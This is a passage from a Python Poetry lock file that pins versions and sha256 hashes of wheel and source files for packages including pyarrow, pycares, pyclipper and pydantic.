{file = "pyarrow-13.0.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:d7759994217c86c161c6a8060509cfdf782b952163569606bb373828afdd82e8"},
{file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:868a073fd0ff6468ae7d869b5fc1f54de5c4255b37f44fb890385eb68b68f95d"},
{file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51be67e29f3cfcde263a113c28e96aa04362ed8229cb7c6e5f5c719003659d33"},
{file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:d1b4e7176443d12610874bb84d0060bf080f000ea9ed7c84b2801df851320295"},
{file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:69b6f9a089d116a82c3ed819eea8fe67dae6105f0d81eaf0fdd5e60d0c6e0944"},
{file = "pyarrow-13.0.0-cp311-cp311-win_amd64.whl", hash = "sha256:ab1268db81aeb241200e321e220e7cd769762f386f92f61b898352dd27e402ce"},
{file = "pyarrow-13.0.0-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:ee7490f0f3f16a6c38f8c680949551053c8194e68de5046e6c288e396dccee80"},
{file = "pyarrow-13.0.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e3ad79455c197a36eefbd90ad4aa832bece7f830a64396c15c61a0985e337287"},
{file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:68fcd2dc1b7d9310b29a15949cdd0cb9bc34b6de767aff979ebf546020bf0ba0"},
{file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dc6fd330fd574c51d10638e63c0d00ab456498fc804c9d01f2a61b9264f2c5b2"},
{file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:e66442e084979a97bb66939e18f7b8709e4ac5f887e636aba29486ffbf373763"},
{file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:0f6eff839a9e40e9c5610d3ff8c5bdd2f10303408312caf4c8003285d0b49565"},
{file = "pyarrow-13.0.0-cp38-cp38-win_amd64.whl", hash = "sha256:8b30a27f1cddf5c6efcb67e598d7823a1e253d743d92ac32ec1eb4b6a1417867"},
{file = "pyarrow-13.0.0-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:09552dad5cf3de2dc0aba1c7c4b470754c69bd821f5faafc3d774bedc3b04bb7"},
{file = "pyarrow-13.0.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3896ae6c205d73ad192d2fc1489cd0edfab9f12867c85b4c277af4d37383c18c"},
{file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6647444b21cb5e68b593b970b2a9a07748dd74ea457c7dadaa15fd469c48ada1"},
{file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47663efc9c395e31d09c6aacfa860f4473815ad6804311c5433f7085415d62a7"},
{file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:b9ba6b6d34bd2563345488cf444510588ea42ad5613df3b3509f48eb80250afd"},
{file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:d00d374a5625beeb448a7fa23060df79adb596074beb3ddc1838adb647b6ef09"},
{file = "pyarrow-13.0.0-cp39-cp39-win_amd64.whl", hash = "sha256:c51afd87c35c8331b56f796eff954b9c7f8d4b7fef5903daf4e05fcf017d23a8"},
{file = "pyarrow-13.0.0.tar.gz", hash = "sha256:83333726e83ed44b0ac94d8d7a21bbdee4a05029c3b1e8db58a863eec8fd8a33"},
]
[package.dependencies]
numpy = ">=1.16.6"
[[package]]
name = "pyasn1"
version = "0.5.0"
description = "Pure-Python implementation of ASN.1 types and DER/BER/CER codecs (X.208)"
optional = true
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7"
files = [
{file = "pyasn1-0.5.0-py2.py3-none-any.whl", hash = "sha256:87a2121042a1ac9358cabcaf1d07680ff97ee6404333bacca15f76aa8ad01a57"},
{file = "pyasn1-0.5.0.tar.gz", hash = "sha256:97b7290ca68e62a832558ec3976f15cbf911bf5d7c7039d8b861c2a0ece69fde"},
]
[[package]]
name = "pyasn1-modules"
version = "0.3.0"
description = "A collection of ASN.1-based protocols modules"
optional = true
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7"
files = [
{file = "pyasn1_modules-0.3.0-py2.py3-none-any.whl", hash = "sha256:d3ccd6ed470d9ffbc716be08bd90efbd44d0734bc9303818f7336070984a162d"},
{file = "pyasn1_modules-0.3.0.tar.gz", hash = "sha256:5bd01446b736eb9d31512a30d46c1ac3395d676c6f3cafa4c03eb54b9925631c"},
]
[package.dependencies]
pyasn1 = ">=0.4.6,<0.6.0"
[[package]]
name = "pycares"
version = "4.4.0"
description = "Python interface for c-ares"
optional = true
python-versions = ">=3.8"
files = [
{file = "pycares-4.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:24da119850841d16996713d9c3374ca28a21deee056d609fbbed29065d17e1f6"},
{file = "pycares-4.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:8f64cb58729689d4d0e78f0bfb4c25ce2f851d0274c0273ac751795c04b8798a"},
{file = "pycares-4.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d33e2a1120887e89075f7f814ec144f66a6ce06a54f5722ccefc62fbeda83cff"},
{file = "pycares-4.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c680fef1b502ee680f8f0b95a41af4ec2c234e50e16c0af5bbda31999d3584bd"},
{file = "pycares-4.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fff16b09042ba077f7b8aa5868d1d22456f0002574d0ba43462b10a009331677"},
{file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:229a1675eb33bc9afb1fc463e73ee334950ccc485bc83a43f6ae5839fb4d5fa3"},
{file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3aebc73e5ad70464f998f77f2da2063aa617cbd8d3e8174dd7c5b4518f967153"},
{file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:6ef64649eba56448f65e26546d85c860709844d2fc22ef14d324fe0b27f761a9"},
{file = "pycares-4.4.0-cp310-cp310-win32.whl", hash = "sha256:4afc2644423f4eef97857a9fd61be9758ce5e336b4b0bd3d591238bb4b8b03e0"},
{file = "pycares-4.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:5ed4e04af4012f875b78219d34434a6d08a67175150ac1b79eb70ab585d4ba8c"},
{file = "pycares-4.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:bce8db2fc6f3174bd39b81405210b9b88d7b607d33e56a970c34a0c190da0490"},
{file = "pycares-4.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:9a0303428d013ccf5c51de59c83f9127aba6200adb7fd4be57eddb432a1edd2a"},
{file = "pycares-4.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:afb91792f1556f97be7f7acb57dc7756d89c5a87bd8b90363a77dbf9ea653817"},
{file = "pycares-4.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b61579cecf1f4d616e5ea31a6e423a16680ab0d3a24a2ffe7bb1d4ee162477ff"},
{file = "pycares-4.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b7af06968cbf6851566e806bf3e72825b0e6671832a2cbe840be1d2d65350710"},
{file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ceb12974367b0a68a05d52f4162b29f575d241bd53de155efe632bf2c943c7f6"},
{file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:2eeec144bcf6a7b6f2d74d6e70cbba7886a84dd373c886f06cb137a07de4954c"},
{file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e3a6f7cfdfd11eb5493d6d632e582408c8f3b429f295f8799c584c108b28db6f"},
{file = "pycares-4.4.0-cp311-cp311-win32.whl", hash = "sha256:34736a2ffaa9c08ca9c707011a2d7b69074bbf82d645d8138bba771479b2362f"},
{file = "pycares-4.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:eb66c30eb11e877976b7ead13632082a8621df648c408b8e15cdb91a452dd502"},
{file = "pycares-4.4.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:fd644505a8cfd7f6584d33a9066d4e3d47700f050ef1490230c962de5dfb28c6"},
{file = "pycares-4.4.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:52084961262232ec04bd75f5043aed7e5d8d9695e542ff691dfef0110209f2d4"},
{file = "pycares-4.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0c5368206057884cde18602580083aeaad9b860e2eac14fd253543158ce1e93"},
{file = "pycares-4.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:112a4979c695b1c86f6782163d7dec58d57a3b9510536dcf4826550f9053dd9a"},
{file = "pycares-4.4.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8d186dafccdaa3409194c0f94db93c1a5d191145a275f19da6591f9499b8e7b8"},
{file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:64965dc19c578a683ea73487a215a8897276224e004d50eeb21f0bc7a0b63c88"},
{file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:ed2a38e34bec6f2586435f6ff0bc5fe11d14bebd7ed492cf739a424e81681540"},
{file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:94d6962db81541eb0396d2f0dfcbb18cdb8c8b251d165efc2d974ae652c547d4"},
{file = "pycares-4.4.0-cp312-cp312-win32.whl", hash = "sha256:1168a48a834813aa80f412be2df4abaf630528a58d15c704857448b20b1675c0"},
{file = "pycares-4.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:db24c4e7fea4a052c6e869cbf387dd85d53b9736cfe1ef5d8d568d1ca925e977"},
{file = "pycares-4.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:21a5a0468861ec7df7befa69050f952da13db5427ae41ffe4713bc96291d1d95"},
{file = "pycares-4.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:22c00bf659a9fa44d7b405cf1cd69b68b9d37537899898d8cbe5dffa4016b273"},
{file = "pycares-4.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:23aa3993a352491a47fcf17867f61472f32f874df4adcbb486294bd9fbe8abee"},
{file = "pycares-4.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:813d661cbe2e37d87da2d16b7110a6860e93ddb11735c6919c8a3545c7b9c8d8"},
{file = "pycares-4.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:77cf5a2fd5583c670de41a7f4a7b46e5cbabe7180d8029f728571f4d2e864084"},
{file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3eaa6681c0a3e3f3868c77aca14b7760fed35fdfda2fe587e15c701950e7bc69"},
{file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:ad58e284a658a8a6a84af2e0b62f2f961f303cedfe551854d7bd40c3cbb61912"},
{file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:bfb89ca9e3d0a9b5332deeb666b2ede9d3469107742158f4aeda5ce032d003f4"},
{file = "pycares-4.4.0-cp38-cp38-win32.whl", hash = "sha256:f36bdc1562142e3695555d2f4ac0cb69af165eddcefa98efc1c79495b533481f"},
{file = "pycares-4.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:902461a92b6a80fd5041a2ec5235680c7cc35e43615639ec2a40e63fca2dfb51"},
{file = "pycares-4.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:7bddc6adba8f699728f7fc1c9ce8cef359817ad78e2ed52b9502cb5f8dc7f741"},
{file = "pycares-4.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cb49d5805cd347c404f928c5ae7c35e86ba0c58ffa701dbe905365e77ce7d641"},
{file = "pycares-4.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56cf3349fa3a2e67ed387a7974c11d233734636fe19facfcda261b411af14d80"},
{file = "pycares-4.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8bf2eaa83a5987e48fa63302f0fe7ce3275cfda87b34d40fef9ce703fb3ac002"},
{file = "pycares-4.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:82bba2ab77eb5addbf9758d514d9bdef3c1bfe7d1649a47bd9a0d55a23ef478b"},
{file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:c6a8bde63106f162fca736e842a916853cad3c8d9d137e11c9ffa37efa818b02"},
{file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:f5f646eec041db6ffdbcaf3e0756fb92018f7af3266138c756bb09d2b5baadec"},
{file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9dc04c54c6ea615210c1b9e803d0e2d2255f87a3d5d119b6482c8f0dfa15b26b"},
{file = "pycares-4.4.0-cp39-cp39-win32.whl", hash = "sha256:97892cced5794d721fb4ff8765764aa4ea48fe8b2c3820677505b96b83d4ef47"},
{file = "pycares-4.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:917f08f0b5d9324e9a34211e68d27447c552b50ab967044776bbab7e42a553a2"},
{file = "pycares-4.4.0.tar.gz", hash = "sha256:f47579d508f2f56eddd16ce72045782ad3b1b3b678098699e2b6a1b30733e1c2"},
]
[package.dependencies]
cffi = ">=1.5.0"
[package.extras]
idna = ["idna (>=2.1)"]
[[package]]
name = "pyclipper"
version = "1.3.0.post5"
description = "Cython wrapper for the C++ translation of the Angus Johnson's Clipper library (ver. 6.4.2)"
optional = true
python-versions = "*"
files = [
{file = "pyclipper-1.3.0.post5-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:3c45f99b8180dd4df4c86642657ca92b7d5289a5e3724521822e0f9461961fe2"},
{file = "pyclipper-1.3.0.post5-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:567ffd419a0bdc3727fa4562cfa1f18484691817a2bc0bc675750aa28ed98bd4"},
{file = "pyclipper-1.3.0.post5-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:59c8c75661a6d87e98b1655851578a2917d3c8859912c9a4f1956b9830940fd9"},
{file = "pyclipper-1.3.0.post5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a496efa146d2d88b59350021739e4685e439dc569b6654e9e6d5e42e9a0b1666"},
{file = "pyclipper-1.3.0.post5-cp310-cp310-win32.whl", hash = "sha256:02a98d09af9b60bcf8e9480d153c0839e20b92689f5602f87242a4933842fecd"},
{file = "pyclipper-1.3.0.post5-cp310-cp310-win_amd64.whl", hash = "sha256:847f1e2fc3994bb498fe675f55c98129b95dc26a5c92304ba4cf0ab40721ea3d"},
{file = "pyclipper-1.3.0.post5-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:b7a983ae019932bfa0a1971a2dc8c856704add5f3d567bed8fac02dbc0e7f0bf"},
{file = "pyclipper-1.3.0.post5-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d8760075c395b924f894aa16ee06e8c040c6f9b63e0903e49de3cc8d82d9e637"},
{file = "pyclipper-1.3.0.post5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e4ea61ca5899d3346c614951342c506f119601ed0a1f4889a9cc236558afec6b"},
{file = "pyclipper-1.3.0.post5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:46499b361ae067662b22578401d83d57716f3cc0071d592feb07d504b439fea7"},
{file = "pyclipper-1.3.0.post5-cp311-cp311-win32.whl", hash = "sha256:d5c77e39ab05a6cf277c819639968b21e6959e996ea1a074afc24236541708ff"},
{file = "pyclipper-1.3.0.post5-cp311-cp311-win_amd64.whl", hash = "sha256:0f78a1c18ff4f9276f78d9353d6ed4309c3886a9d0172437e48328aef499165e"},
{file = "pyclipper-1.3.0.post5-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:5237282f906049c307e6c90333c7d56f6b8712bf087ef97b141830c40b09ca0a"},
{file = "pyclipper-1.3.0.post5-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:aca8635573646b65c054399433fb3493637f1445db942de8a52fca9ef493ba3d"},
{file = "pyclipper-1.3.0.post5-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1158a2b13d59bdfab33d1d928f7b72c8c7fb8a76e7d2283839cb45d7c0ff2140"},
{file = "pyclipper-1.3.0.post5-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5a041f1a7982b17cf92fd3be349ec41ff1901792149c166bf283f469567b52d6"},
{file = "pyclipper-1.3.0.post5-cp312-cp312-win32.whl", hash = "sha256:bf3a2ccd6e4e078250b0a31a12c519b0be6d1bc160acfceee62407dbd68558f6"},
{file = "pyclipper-1.3.0.post5-cp312-cp312-win_amd64.whl", hash = "sha256:2ce6e0a6ab32182c26537965cf521822cd11a28a7ffcef48635a94c6ca8559ef"},
{file = "pyclipper-1.3.0.post5-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:010ee13d40d924341cc41b6d9901d763175040c68753939f140bc0cc714f18bb"},
{file = "pyclipper-1.3.0.post5-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ee1c4797b1dc982ae9d60333269536ea03ddc0baa1c3383a6d5b741dbbb12675"},
{file = "pyclipper-1.3.0.post5-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:ba692cf11873886085a0445dcfc362b24ca35bcb997ad9e9b5685854a290d8ff"},
{file = "pyclipper-1.3.0.post5-cp36-cp36m-win32.whl", hash = "sha256:f0b84fcf5230aca2de06ddb7920459daa858853835f8774739ca30dd516e7d37"},
{file = "pyclipper-1.3.0.post5-cp36-cp36m-win_amd64.whl", hash = "sha256:741910bfd7b0bd40f027869f4bf86bdd9678ae7f74e8dabcf62d170269f6191d"},
{file = "pyclipper-1.3.0.post5-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5f3484b4dffa64f0e3a43b63165a5c0f507c5850e70b9cc2eaa82474d7746393"},
{file = "pyclipper-1.3.0.post5-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87efec9795744cef786f2f8cab17d6dc07f57dfce5e3b7f3be96eb79a4ce5794"},
{file = "pyclipper-1.3.0.post5-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:5f445a2d03690faa23a1b90e32dfb4352a60b23437323de87388c6c611d3d1e3"},
{file = "pyclipper-1.3.0.post5-cp37-cp37m-win32.whl", hash = "sha256:eb9d1cb2999bc1ea8ad1c3a031ba33b0a89a5ace25d33df7529d3ff18c16604c"},
{file = "pyclipper-1.3.0.post5-cp37-cp37m-win_amd64.whl", hash = "sha256:ead0f3ecd1961005f61d50c896e33442138b4e7c9e0c035784d3525068dd2b10"},
{file = "pyclipper-1.3.0.post5-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:39ccd920b192a4f8096589a2a1f8faaf6aaaadb7a163b5ce913d03faac2449bb"},
{file = "pyclipper-1.3.0.post5-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:e346e7adba43e40f5f5f293b6b6a45de5a6a3bdc74e437dedd948c5d74de9405"},
{file = "pyclipper-1.3.0.post5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bb2fb22927c3ac3191e555efd335c6efa819aa1ff4d0901979673ab5a18eb740"},
{file = "pyclipper-1.3.0.post5-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:a678999d728023f1f3988a14a2e6d89d6f1ed4d0786d5992c1bffb4c1ab30318"},
{file = "pyclipper-1.3.0.post5-cp38-cp38-win32.whl", hash = "sha256:36d456fdf32a6410a87bd7af8ebc4c01f19b4e3b839104b3072558cad0d8bf4c"},
{file = "pyclipper-1.3.0.post5-cp38-cp38-win_amd64.whl", hash = "sha256:c9c1fdf4ecae6b55033ede3f4e931156ffc969334300f44f8bf1b356ec0a3d63"},
{file = "pyclipper-1.3.0.post5-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8bb9cd95fd4bd88fb1590d1763a52e3ea6a1095e11b3e885ff164da1313aae79"},
{file = "pyclipper-1.3.0.post5-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:0f516fd69aa61a9698a3ce3ba2f7edda5ac6aafc8d964ee3bc60897906947fcb"},
{file = "pyclipper-1.3.0.post5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e36f018303656ea4a629d2fba0d0d4c74960eacec7119fe2ab3c658ce84c494b"},
{file = "pyclipper-1.3.0.post5-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:dd3c4b312a931e668a7a291d4bd5b10bacb0687bd163220a9f0418c7e23169e2"},
{file = "pyclipper-1.3.0.post5-cp39-cp39-win32.whl", hash = "sha256:cfea42972e90954b3c89da9216993373a2270a5103d4916fd543a1109528ed4c"},
{file = "pyclipper-1.3.0.post5-cp39-cp39-win_amd64.whl", hash = "sha256:85ca06f382f999903d809380e4c01ec127d3eb26431402e9b3f01facaec68b80"},
{file = "pyclipper-1.3.0.post5-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:da30e59c684eea198f6e19244e9a41e855a23a416cc708821fd4eb8f5f18626c"},
{file = "pyclipper-1.3.0.post5-pp38-pypy38_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d8a9e3e46aa50e4c3667db9a816d59ae4f9c62b05f997abb8a9b3f3afe6d94a4"},
{file = "pyclipper-1.3.0.post5-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0589b80f2da1ad322345a93c053b5d46dc692def5a188351be01f34bcf041218"},
{file = "pyclipper-1.3.0.post5.tar.gz", hash = "sha256:c0239f928e0bf78a3efc2f2f615a10bfcdb9f33012d46d64c8d1225b4bde7096"},
]
[[package]]
name = "pycparser"
version = "2.21"
description = "C parser in Python"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
files = [
{file = "pycparser-2.21-py2.py3-none-any.whl", hash = "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9"},
{file = "pycparser-2.21.tar.gz", hash = "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206"},
]
[[package]]
name = "pydantic"
version = "1.10.13"
description = "Data validation and settings management using python type hints"
optional = false
python-versions = ">=3.7"
files = [
{file = "pydantic-1.10.13-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:efff03cc7a4f29d9009d1c96ceb1e7a70a65cfe86e89d34e4a5f2ab1e5693737"},
{file = "pydantic-1.10.13-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:3ecea2b9d80e5333303eeb77e180b90e95eea8f765d08c3d278cd56b00345d01"},
{file = "pydantic-1.10.13-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1740068fd8e2ef6eb27a20e5651df000978edce6da6803c2bef0bc74540f9548"},
{file = "pydantic-1.10.13-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84bafe2e60b5e78bc64a2941b4c071a4b7404c5c907f5f5a99b0139781e69ed8"},
{file = "pydantic-1.10.13-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:bc0898c12f8e9c97f6cd44c0ed70d55749eaf783716896960b4ecce2edfd2d69"},
{file = "pydantic-1.10.13-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:654db58ae399fe6434e55325a2c3e959836bd17a6f6a0b6ca8107ea0571d2e17"},
{file = "pydantic-1.10.13-cp310-cp310-win_amd64.whl", hash = "sha256:75ac15385a3534d887a99c713aa3da88a30fbd6204a5cd0dc4dab3d770b9bd2f"},
{file = "pydantic-1.10.13-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c553f6a156deb868ba38a23cf0df886c63492e9257f60a79c0fd8e7173537653"},
{file = "pydantic-1.10.13-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:5e08865bc6464df8c7d61439ef4439829e3ab62ab1669cddea8dd00cd74b9ffe"},
{file = "pydantic-1.10.13-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e31647d85a2013d926ce60b84f9dd5300d44535a9941fe825dc349ae1f760df9"},
{file = "pydantic-1.10.13-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:210ce042e8f6f7c01168b2d84d4c9eb2b009fe7bf572c2266e235edf14bacd80"},
{file = "pydantic-1.10.13-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:8ae5dd6b721459bfa30805f4c25880e0dd78fc5b5879f9f7a692196ddcb5a580"},
{file = "pydantic-1.10.13-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:f8e81fc5fb17dae698f52bdd1c4f18b6ca674d7068242b2aff075f588301bbb0"},
{file = "pydantic-1.10.13-cp311-cp311-win_amd64.whl", hash = "sha256:61d9dce220447fb74f45e73d7ff3b530e25db30192ad8d425166d43c5deb6df0"},
{file = "pydantic-1.10.13-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:4b03e42ec20286f052490423682016fd80fda830d8e4119f8ab13ec7464c0132"},
{file = "pydantic-1.10.13-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f59ef915cac80275245824e9d771ee939133be38215555e9dc90c6cb148aaeb5"},
{file = "pydantic-1.10.13-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5a1f9f747851338933942db7af7b6ee8268568ef2ed86c4185c6ef4402e80ba8"},
{file = "pydantic-1.10.13-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:97cce3ae7341f7620a0ba5ef6cf043975cd9d2b81f3aa5f4ea37928269bc1b87"},
{file = "pydantic-1.10.13-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:854223752ba81e3abf663d685f105c64150873cc6f5d0c01d3e3220bcff7d36f"},
{file = "pydantic-1.10.13-cp37-cp37m-win_amd64.whl", hash = "sha256:b97c1fac8c49be29486df85968682b0afa77e1b809aff74b83081cc115e52f33"},
{file = "pydantic-1.10.13-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c958d053453a1c4b1c2062b05cd42d9d5c8eb67537b8d5a7e3c3032943ecd261"},
{file = "pydantic-1.10.13-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4c5370a7edaac06daee3af1c8b1192e305bc102abcbf2a92374b5bc793818599"},
{file = "pydantic-1.10.13-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d6f6e7305244bddb4414ba7094ce910560c907bdfa3501e9db1a7fd7eaea127"},
{file = "pydantic-1.10.13-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d3a3c792a58e1622667a2837512099eac62490cdfd63bd407993aaf200a4cf1f"},
{file = "pydantic-1.10.13-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:c636925f38b8db208e09d344c7aa4f29a86bb9947495dd6b6d376ad10334fb78"},
{file = "pydantic-1.10.13-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:678bcf5591b63cc917100dc50ab6caebe597ac67e8c9ccb75e698f66038ea953"},
{file = "pydantic-1.10.13-cp38-cp38-win_amd64.whl", hash = "sha256:6cf25c1a65c27923a17b3da28a0bdb99f62ee04230c931d83e888012851f4e7f"},
{file = "pydantic-1.10.13-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8ef467901d7a41fa0ca6db9ae3ec0021e3f657ce2c208e98cd511f3161c762c6"},
